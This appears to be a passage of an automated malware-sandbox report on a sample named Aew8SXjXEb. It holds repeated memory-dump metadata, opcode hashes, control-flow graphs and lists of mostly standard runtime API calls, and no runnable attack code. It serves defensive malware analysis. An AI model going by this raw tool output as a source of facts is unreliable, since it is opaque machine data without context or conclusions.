                                                                    • Instruction ID: ee8078f77be02082b666f5c81f76857b16c12b1e54a584d0f0fec84b23fac791
                                                                    • Opcode Fuzzy Hash: dd41b8ec75ebc3062ae16d529f0e7698ebe5900682256dd735263e4e796cae81
                                                                    • Instruction Fuzzy Hash:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Z81xbyuAua
                                                                    • API String ID: 0-3121583705
                                                                    • Opcode ID: 8c4b5a692fceb3c9df64d322c580bf3f7cee7e0dc8515aa19441b2ff124f8f00
                                                                    • Instruction ID: 6bcf530c4370c70237f10152bb4fdb596af274980dd08a022e37b27a9a57aa18
                                                                    • Opcode Fuzzy Hash: 8c4b5a692fceb3c9df64d322c580bf3f7cee7e0dc8515aa19441b2ff124f8f00
                                                                    • Instruction Fuzzy Hash: E7413B76E2453B5BCB4CEEB898560EBBB65EB56310B01427ADD50DF3D1E2348A01CAD4
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: b40f3fb367538d78ad4b5eb3b512996c64f6716ecd4be1e5370eda9a1e737c90
                                                                    • Instruction ID: 4050ebbc924c18cbf125260df4714e2df03bea854e8e03dccaa6acd57d43fc42
                                                                    • Opcode Fuzzy Hash: b40f3fb367538d78ad4b5eb3b512996c64f6716ecd4be1e5370eda9a1e737c90
                                                                    • Instruction Fuzzy Hash: AEA011302022008B8B008F38AF0A2083AEAAA0E280308A02AA000C2220EB208080AA00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                    • String ID:
                                                                    • API String ID: 3471368781-0
                                                                    • Opcode ID: 36283cf9cd79c63a4a3f221dd9018c2e044bab8d9b0c9ae96b33d505ab8631be
                                                                    • Instruction ID: 74b82f8028c3b7a84aac09e2c7ce275843a690cbec4099f355628304900b9df5
                                                                    • Opcode Fuzzy Hash: 36283cf9cd79c63a4a3f221dd9018c2e044bab8d9b0c9ae96b33d505ab8631be
                                                                    • Instruction Fuzzy Hash: 67B108356007059BDB389F25CC92BF7B3AAEF44308F14542DEB47C6681EB75A982CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
                                                                    • Instruction ID: 12210fc181ade283cb6a1e10f919da3700f3bfb6863a246bf12cfd8629fb2f49
                                                                    • Opcode Fuzzy Hash: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
                                                                    • Instruction Fuzzy Hash: 38E08C32921238EBCB14DBD8C94598AF3EDEB45B04F15449AB501D3210C271DE00D7D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f762b7d524804140333cdee9646699af19493c89fd3e4bb69c51dfda8bef2c92
                                                                    • Instruction ID: da8b0b63c12a385a2789ff0eaa4c0f8e8b84b63f731f1063036368113eaa22c1
                                                                    • Opcode Fuzzy Hash: f762b7d524804140333cdee9646699af19493c89fd3e4bb69c51dfda8bef2c92
                                                                    • Instruction Fuzzy Hash: 91D0953A601A149FC320CF09E940941F7BAFB99A30B1681A6E904A3B20C330FC02CAE0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
                                                                    • Instruction ID: 737288202c6fce1b44fd6b50589cb913947b779920ca9ad36b3bb5bfe98afbc0
                                                                    • Opcode Fuzzy Hash: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
                                                                    • Instruction Fuzzy Hash: 45C08C3400090096DE39891083723E43357ABA3782F8404CCDC1A0B742C51E9C8AEA81

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2210 6253b1-6253eb call 6271d0 call 624d27 call 6216b4 call 62172e 2219 625430-62543f call 624d7f call 6271ad 2210->2219 2220 6253ed-6253ef 2210->2220 2222 6253f1-6253f3 2220->2222 2223 6253f5-625406 call 625995 2220->2223 2222->2219 2229 625440-62546d call 62158a call 625587 2223->2229 2230 625408-62542a call 625048 2223->2230 2230->2219
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 006253B8
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006253C2
                                                                    • int.LIBCPMT ref: 006253D9
                                                                      • Part of subcall function 006216B4: std::_Lockit::_Lockit.LIBCPMT ref: 006216C5
                                                                      • Part of subcall function 006216B4: std::_Lockit::~_Lockit.LIBCPMT ref: 006216DF
                                                                    • std::_Facet_Register.LIBCPMT ref: 00625413
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00625433
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00625440
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                    • String ID: R[b
                                                                    • API String ID: 55977855-1787471655
                                                                    • Opcode ID: 523447c57a64fe32dcc82c54c8cc6cd992a77cca53f98d9c5aadd843cf24cc60
                                                                    • Instruction ID: c2a349b8162c66daa159f2ba5242c04bbcdec1dc8342bdc65eebf89571d2a7de
                                                                    • Opcode Fuzzy Hash: 523447c57a64fe32dcc82c54c8cc6cd992a77cca53f98d9c5aadd843cf24cc60
                                                                    • Instruction Fuzzy Hash: FE119075914E349BCB60EF64A8056BEB7A7AF55320F14050DE802AB791DF70AE408F89

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2240 62a5c8-62a5f3 call 62b540 2243 62a967-62a96c call 630409 2240->2243 2244 62a5f9-62a5fc 2240->2244 2244->2243 2245 62a602-62a60b 2244->2245 2247 62a611-62a615 2245->2247 2248 62a708-62a70e 2245->2248 2247->2248 2250 62a61b-62a622 2247->2250 2251 62a716-62a724 2248->2251 2252 62a624-62a62b 2250->2252 2253 62a63a-62a63f 2250->2253 2254 62a8d0-62a8d3 2251->2254 2255 62a72a-62a72e 2251->2255 2252->2253 2257 62a62d-62a634 2252->2257 2253->2248 2258 62a645-62a64d call 62a24c 2253->2258 2259 62a8f6-62a8ff call 62a24c 2254->2259 2260 62a8d5-62a8d8 2254->2260 2255->2254 2256 62a734-62a73b 2255->2256 2261 62a753-62a759 2256->2261 2262 62a73d-62a744 2256->2262 2257->2248 2257->2253 2272 62a653-62a66c call 62a24c * 2 2258->2272 2273 62a901-62a905 2258->2273 2259->2243 2259->2273 2260->2243 2265 62a8de-62a8f3 call 62a96d 2260->2265 2269 62a870-62a874 2261->2269 2270 62a75f-62a786 call 628406 2261->2270 2262->2261 2268 62a746-62a74d 2262->2268 2265->2259 2268->2254 2268->2261 2276 62a880-62a88c 2269->2276 2277 62a876-62a87f call 6287cc 2269->2277 2270->2269 2285 62a78c-62a78f 2270->2285 2272->2243 2299 62a672-62a678 2272->2299 2276->2259 2281 62a88e-62a898 2276->2281 2277->2276 2282 62a8a6-62a8a8 2281->2282 2283 62a89a-62a89c 2281->2283 2288 62a8aa-62a8bd call 62a24c * 2 2282->2288 2289 62a8bf-62a8cc call 62afe6 2282->2289 2283->2259 2287 62a89e-62a8a2 2283->2287 2291 62a792-62a7a7 2285->2291 2287->2259 2292 62a8a4 2287->2292 2315 62a906 call 632cce 2288->2315 2307 62a92b-62a940 call 62a24c * 2 2289->2307 2308 62a8ce 2289->2308 2295 62a851-62a864 2291->2295 2296 62a7ad-62a7b0 2291->2296 2292->2288 2295->2291 2300 62a86a-62a86d 2295->2300 2296->2295 2301 62a7b6-62a7be 2296->2301 2304 62a6a4-62a6ac call 62a24c 2299->2304 2305 62a67a-62a67e 2299->2305 2300->2269 2301->2295 2306 62a7c4-62a7d8 2301->2306 2326 62a710-62a713 2304->2326 2327 62a6ae-62a6ce call 62a24c * 2 call 62afe6 2304->2327 2305->2304 2310 62a680-62a687 2305->2310 2311 62a7db-62a7ec 2306->2311 2336 62a942 2307->2336 2337 62a945-62a962 call 6285f2 call 62aee6 call 62b0a3 call 62ae5d 2307->2337 2308->2259 2316 62a69b-62a69e 2310->2316 2317 62a689-62a690 2310->2317 2318 62a812-62a81f 2311->2318 2319 62a7ee-62a7ff call 62aaa3 2311->2319 2331 62a90b-62a926 call 6287cc call 62ac57 call 62839a 2315->2331 2316->2243 2316->2304 2317->2316 2324 62a692-62a699 2317->2324 2318->2311 2322 62a821 2318->2322 2333 62a823-62a84b call 62a548 2319->2333 2334 62a801-62a80a 2319->2334 2330 62a84e 2322->2330 2324->2304 2324->2316 2326->2251 2327->2326 2354 62a6d0-62a6d5 2327->2354 2330->2295 2331->2307 2333->2330 2334->2319 2339 62a80c-62a80f 2334->2339 2336->2337 2337->2243 2339->2318 2354->2315 2356 62a6db-62a6ee call 62ac6f 2354->2356 2356->2331 2361 62a6f4-62a700 2356->2361 2361->2315 2362 62a706 2361->2362 2362->2356
                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 0062A6E7
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 0062A7F5
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 0062A962
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 1206542248-393685449
                                                                    • Opcode ID: b05a0bd603589c9e1113c9173d035de071246e877dcd5e9f354ae0dd971d84a9
                                                                    • Instruction ID: c42aa8c8c2bb557ea9ca0b777ac6711955d8ab45014661a09cfb2462fbf22ed1
                                                                    • Opcode Fuzzy Hash: b05a0bd603589c9e1113c9173d035de071246e877dcd5e9f354ae0dd971d84a9
                                                                    • Instruction Fuzzy Hash: 1CB19A31C00A29EFCF14DFE4E9819AEB7B6BF14310B15815AE8116B302D7B5DA52CF96

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2424 635f4a-635f56 2425 635fe8-635feb 2424->2425 2426 635ff1 2425->2426 2427 635f5b-635f6c 2425->2427 2430 635ff3-635ff7 2426->2430 2428 635f79-635f92 LoadLibraryExW 2427->2428 2429 635f6e-635f71 2427->2429 2433 635f94-635f9d GetLastError 2428->2433 2434 635ff8-636008 2428->2434 2431 636011-636013 2429->2431 2432 635f77 2429->2432 2431->2430 2436 635fe5 2432->2436 2437 635fd6-635fe3 2433->2437 2438 635f9f-635fb1 call 633428 2433->2438 2434->2431 2435 63600a-63600b FreeLibrary 2434->2435 2435->2431 2436->2425 2437->2436 2438->2437 2441 635fb3-635fc5 call 633428 2438->2441 2441->2437 2444 635fc7-635fd4 LoadLibraryExW 2441->2444 2444->2434 2444->2437
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,0C77E109,?,00636057,0062C446,?,F8250000,00000000), ref: 0063600B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3664257935-537541572
                                                                    • Opcode ID: be29ca317abe8019e22d40ee29070ab8eb559044b4e085d933f83a2a3c67ada5
                                                                    • Instruction ID: b6d08282ab21699bc9384e1d014d91b82c8acbaf2be7fa22f66f3296324042ed
                                                                    • Opcode Fuzzy Hash: be29ca317abe8019e22d40ee29070ab8eb559044b4e085d933f83a2a3c67ada5
                                                                    • Instruction Fuzzy Hash: F021DD35A00520A7C7319F64DD45AAE77ABAF42760F251219F917EB3D1DB30ED01CAE0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
                                                                    • String ID: R[b
                                                                    • API String ID: 156189095-1787471655
                                                                    • Opcode ID: 50b670a42820a248f090bc160e4147c39f6c9cd3cff861627510d300eaf7563d
                                                                    • Instruction ID: 9480c8c3cee7d6071b0768aeeea18357830e71e96029decf27a5d8f7b09ad571
                                                                    • Opcode Fuzzy Hash: 50b670a42820a248f090bc160e4147c39f6c9cd3cff861627510d300eaf7563d
                                                                    • Instruction Fuzzy Hash: 63019A39A009748BC705AF20E955ABC7B63BF86340B54500EE80257381CF74AA02CF89
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,0C77E109,?,?,00000000,00641FC8,000000FF,?,00630EE0,00631010,?,00630EB4,00000000), ref: 00630F85
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00630F97
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00641FC8,000000FF,?,00630EE0,00631010,?,00630EB4,00000000), ref: 00630FB9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$R[b$mscoree.dll
                                                                    • API String ID: 4061214504-2078170047
                                                                    • Opcode ID: d798ed87ba449eafad280a904f67609cc9019543d859b2f470760936b6d33a0f
                                                                    • Instruction ID: 7cf4a7bf189d98a1fd36abae418da590877604629a635be1648c04bb0985fd0b
                                                                    • Opcode Fuzzy Hash: d798ed87ba449eafad280a904f67609cc9019543d859b2f470760936b6d33a0f
                                                                    • Instruction Fuzzy Hash: 45016275944625EFDB219F54DC09FEEBBBAFB06F14F040629FC11A2390DB749904CA90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c16a1f3bef3a7cefb00e8d767d6fcd85b4482d64acbadc8f00132bd4a834217
                                                                    • Instruction ID: 037c399848f5dbcf191d14dd091d466f9e7f2d7d0d495e89f41f4b3348e30671
                                                                    • Opcode Fuzzy Hash: 2c16a1f3bef3a7cefb00e8d767d6fcd85b4482d64acbadc8f00132bd4a834217
                                                                    • Instruction Fuzzy Hash: E8B1E270E04649AFDB11DFA9E881BAD7BB7EF46310F144169E4019B3A2CB719D42CFA1
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,0062A251,00628978,00627AFF), ref: 0062A268
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0062A276
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0062A28F
                                                                    • SetLastError.KERNEL32(00000000,0062A251,00628978,00627AFF), ref: 0062A2E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: fbd03160ce1bfc4f94f0ad09353c1d47d253c437bc7d7565ba1aa013defacc91
                                                                    • Instruction ID: 2035a19a560ddead550e55e8949f3b4d6fedd1b00c93118f0d9b956ad20f1a97
                                                                    • Opcode Fuzzy Hash: fbd03160ce1bfc4f94f0ad09353c1d47d253c437bc7d7565ba1aa013defacc91
                                                                    • Instruction Fuzzy Hash: DF01F53660EF32AF97543BF47D866A62787EB03F74B24532DF410522E1EF924D02594A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
